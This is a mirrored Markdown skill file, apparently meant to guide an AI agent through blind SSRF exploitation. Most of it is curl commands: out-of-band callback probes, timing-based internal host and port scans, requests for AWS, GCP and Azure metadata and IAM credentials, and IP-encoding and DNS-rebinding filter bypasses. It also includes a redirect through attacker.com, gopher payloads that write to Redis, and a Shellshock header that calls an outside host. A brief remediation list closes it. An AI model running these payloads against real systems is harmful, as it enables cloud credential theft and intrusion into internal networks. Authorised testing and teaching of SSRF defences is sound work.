mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-13 19:05:17 +03:00
235 lines
9.4 KiB
Markdown
235 lines
9.4 KiB
Markdown
---
|
|
name: performing-blind-ssrf-exploitation
|
|
description: Detect and exploit blind Server-Side Request Forgery vulnerabilities using out-of-band techniques, DNS interactions, and timing analysis to access internal services and cloud metadata endpoints.
|
|
domain: cybersecurity
|
|
subdomain: web-application-security
|
|
tags: [blind-ssrf, ssrf, out-of-band, burp-collaborator, cloud-metadata, internal-network, oob-detection]
|
|
version: "1.0"
|
|
author: mahipal
|
|
license: MIT
|
|
---
|
|
|
|
# Performing Blind SSRF Exploitation
|
|
|
|
## When to Use
|
|
- When testing URL/webhook input parameters where server-side responses are not reflected
|
|
- During assessment of applications that fetch external resources (avatars, previews, imports)
|
|
- When testing PDF generators, image processors, or document converters for SSRF
|
|
- During cloud security assessments to detect metadata endpoint access
|
|
- When evaluating webhook functionality and URL validation implementations
|
|
|
|
## Prerequisites
|
|
- Burp Suite Professional with Burp Collaborator for OOB detection
|
|
- interact.sh or webhook.site for external callback monitoring
|
|
- Understanding of SSRF attack vectors and internal network enumeration
|
|
- Knowledge of cloud metadata endpoints (AWS, GCP, Azure)
|
|
- VPS or controlled server for advanced exploitation callback handling
|
|
- Python with requests library for automation scripts
|
|
|
|
## Workflow
|
|
|
|
### Step 1 — Identify Blind SSRF Input Points
|
|
```bash
|
|
# Common SSRF-susceptible parameters:
|
|
# url=, uri=, path=, dest=, redirect=, src=, source=
|
|
# link=, imageURL=, callback=, webhook=, feed=, import=
|
|
|
|
# Test URL fetch functionality
|
|
curl -X POST http://target.com/api/fetch-url \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"url": "http://BURP-COLLABORATOR-SUBDOMAIN.oastify.com"}'
|
|
|
|
# Test webhook configuration
|
|
curl -X POST http://target.com/api/webhooks \
|
|
-H "Authorization: Bearer TOKEN" \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"callback_url": "http://COLLABORATOR.oastify.com/webhook"}'
|
|
|
|
# Test image/avatar URL
|
|
curl -X POST http://target.com/api/profile/avatar \
|
|
-H "Authorization: Bearer TOKEN" \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"avatar_url": "http://COLLABORATOR.oastify.com/avatar.png"}'
|
|
|
|
# Test document import
|
|
curl -X POST http://target.com/api/import \
|
|
-H "Content-Type: application/json" \
|
|
-d '{"import_url": "http://COLLABORATOR.oastify.com/data.csv"}'
|
|
```
|
|
|
|
### Step 2 — Confirm Blind SSRF with Out-of-Band Detection
|
|
```bash
|
|
# Use Burp Collaborator for DNS + HTTP callbacks
|
|
# Generate collaborator payload: xxxxxx.oastify.com
|
|
|
|
# DNS-based detection (works even with HTTP blocked)
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://dns-only-test.COLLABORATOR.oastify.com"}'
|
|
# Check Collaborator for DNS lookups
|
|
|
|
# HTTP-based detection
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://http-test.COLLABORATOR.oastify.com"}'
|
|
# Check for HTTP requests in Collaborator
|
|
|
|
# interact.sh alternative
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://RANDOM.interact.sh"}'
|
|
# Monitor interact.sh dashboard for interactions
|
|
```
|
|
|
|
### Step 3 — Enumerate Internal Network
|
|
```bash
|
|
# Scan internal IP ranges via blind SSRF
|
|
# Use timing differences to determine if hosts are alive
|
|
|
|
# Scan common internal ranges
|
|
for ip in 10.0.0.{1..10} 172.16.0.{1..10} 192.168.1.{1..10}; do
|
|
start=$(date +%s%N)
|
|
curl -X POST http://target.com/api/fetch -d "{\"url\": \"http://$ip/\"}" -s -o /dev/null --max-time 5
|
|
end=$(date +%s%N)
|
|
elapsed=$(( (end - start) / 1000000 ))
|
|
echo "$ip: ${elapsed}ms"
|
|
done
|
|
|
|
# Port scanning via blind SSRF
|
|
for port in 80 443 8080 8443 3000 5000 6379 27017 5432 3306 9200; do
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d "{\"url\": \"http://127.0.0.1:$port/\"}" -s -o /dev/null -w "%{time_total}\n"
|
|
echo "Port $port tested"
|
|
done
|
|
|
|
# Use gopher:// for more advanced internal service interaction
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "gopher://127.0.0.1:6379/_INFO"}'
|
|
```
|
|
|
|
### Step 4 — Access Cloud Metadata Endpoints
|
|
```bash
|
|
# AWS metadata (IMDSv1)
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
|
|
|
|
# AWS IAM credentials
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}'
|
|
|
|
# GCP metadata
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://metadata.google.internal/computeMetadata/v1/"}'
|
|
|
|
# Azure metadata
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://169.254.169.254/metadata/instance?api-version=2021-02-01"}'
|
|
|
|
# DNS rebinding for metadata access (bypass IP blocking)
|
|
# Use services like rebinder.net to create DNS rebinding domains
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://A.169.254.169.254.1time.YOUR-REBIND-DOMAIN.com/"}'
|
|
```
|
|
|
|
### Step 5 — Bypass SSRF Filters
|
|
```bash
|
|
# IP representation bypass
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://0x7f000001/"}' # Hex
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://2130706433/"}' # Decimal
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://0177.0.0.1/"}' # Octal
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.1/"}' # Short
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://[::1]/"}' # IPv6
|
|
|
|
# URL parsing confusion
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://target.com@127.0.0.1/"}'
|
|
curl -X POST http://target.com/api/fetch -d '{"url": "http://127.0.0.1#@target.com/"}'
|
|
|
|
# Redirect-based bypass
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://attacker.com/redirect?url=http://169.254.169.254/"}'
|
|
|
|
# DNS rebinding
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://make-169-254-169-254-rr.1u.ms/"}'
|
|
```
|
|
|
|
### Step 6 — Escalate Blind SSRF to Data Exfiltration
|
|
```bash
|
|
# Exfiltrate data via DNS (when only DNS callback works)
|
|
# If you achieve SSRF to a service that reflects data:
|
|
# Chain: SSRF -> internal service -> DNS exfiltration
|
|
|
|
# Use gopher protocol for Redis command execution
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "gopher://127.0.0.1:6379/_SET%20ssrf_test%20exploited%0AQUIT"}'
|
|
|
|
# Chain blind SSRF with Shellshock on internal hosts
|
|
curl -X POST http://target.com/api/fetch \
|
|
-d '{"url": "http://internal-cgi-server/cgi-bin/test.sh"}'
|
|
# With User-Agent: () { :; }; /bin/bash -c "ping -c1 COLLABORATOR.oastify.com"
|
|
|
|
# Exploit internal services via SSRF
|
|
# Redis: write SSH key
|
|
# Memcached: inject serialized objects
|
|
# Elasticsearch: read indices
|
|
# Internal API: access authenticated endpoints
|
|
```
|
|
|
|
## Key Concepts
|
|
|
|
| Concept | Description |
|
|
|---------|-------------|
|
|
| Blind SSRF | Server makes request but response is not visible to attacker |
|
|
| Out-of-Band Detection | Using external callbacks (DNS, HTTP) to confirm SSRF execution |
|
|
| DNS Rebinding | Technique to bypass IP-based SSRF filters by changing DNS resolution |
|
|
| Cloud Metadata | Instance metadata endpoints accessible via SSRF for credential theft |
|
|
| Gopher Protocol | Protocol allowing crafted payloads to interact with internal TCP services |
|
|
| Time-Based Detection | Detecting SSRF success by measuring response time differences |
|
|
| SSRF Chain | Combining SSRF with other vulnerabilities for greater impact |
|
|
|
|
## Tools & Systems
|
|
|
|
| Tool | Purpose |
|
|
|------|---------|
|
|
| Burp Collaborator | Out-of-band interaction server for DNS and HTTP callback detection |
|
|
| interact.sh | Open-source OOB interaction tool by ProjectDiscovery |
|
|
| SSRFmap | Automated SSRF detection and exploitation framework |
|
|
| Gopherus | Generate gopher payloads for exploiting internal services via SSRF |
|
|
| webhook.site | Free webhook receiver for testing SSRF callbacks |
|
|
| rebinder.net | DNS rebinding service for bypassing SSRF IP filters |
|
|
|
|
## Common Scenarios
|
|
|
|
1. **Cloud Credential Theft** — Exploit blind SSRF to access AWS/GCP/Azure metadata endpoints and steal IAM credentials for cloud account compromise
|
|
2. **Internal Service Discovery** — Use timing-based blind SSRF to enumerate internal network hosts and open ports
|
|
3. **Redis Exploitation** — Chain blind SSRF with gopher:// protocol to execute commands on internal Redis instances
|
|
4. **Webhook Abuse** — Exploit webhook URL fields to scan internal networks and exfiltrate data through OOB channels
|
|
5. **PDF Generator SSRF** — Inject internal URLs into PDF generation features to exfiltrate internal content in rendered documents
|
|
|
|
## Output Format
|
|
|
|
```
|
|
## Blind SSRF Assessment Report
|
|
- **Target**: http://target.com/api/fetch-url
|
|
- **Detection Method**: Burp Collaborator DNS + HTTP callback
|
|
- **Internal Access Confirmed**: Yes
|
|
|
|
### Findings
|
|
| # | Input Point | Payload | Detection | Impact |
|
|
|---|------------|---------|-----------|--------|
|
|
| 1 | POST /api/fetch url parameter | http://collaborator | HTTP callback | Confirmed SSRF |
|
|
| 2 | POST /api/avatar avatar_url | http://169.254.169.254 | Timing (2.3s vs 0.1s) | Cloud metadata |
|
|
| 3 | POST /api/webhook callback | gopher://127.0.0.1:6379 | Redis write confirmed | RCE potential |
|
|
|
|
### Internal Network Map
|
|
| Host | Port | Service | Accessible |
|
|
|------|------|---------|-----------|
|
|
| 10.0.0.5 | 6379 | Redis | Yes |
|
|
| 10.0.0.10 | 9200 | Elasticsearch | Yes |
|
|
| 169.254.169.254 | 80 | AWS Metadata | Yes |
|
|
|
|
### Remediation
|
|
- Implement allowlist of permitted external domains for URL fetching
|
|
- Block requests to private IP ranges and cloud metadata endpoints
|
|
- Use IMDSv2 (token-required) for AWS instance metadata
|
|
- Disable unused URL schemes (gopher, file, dict)
|
|
- Implement network-level segmentation for application servers
|
|
```
|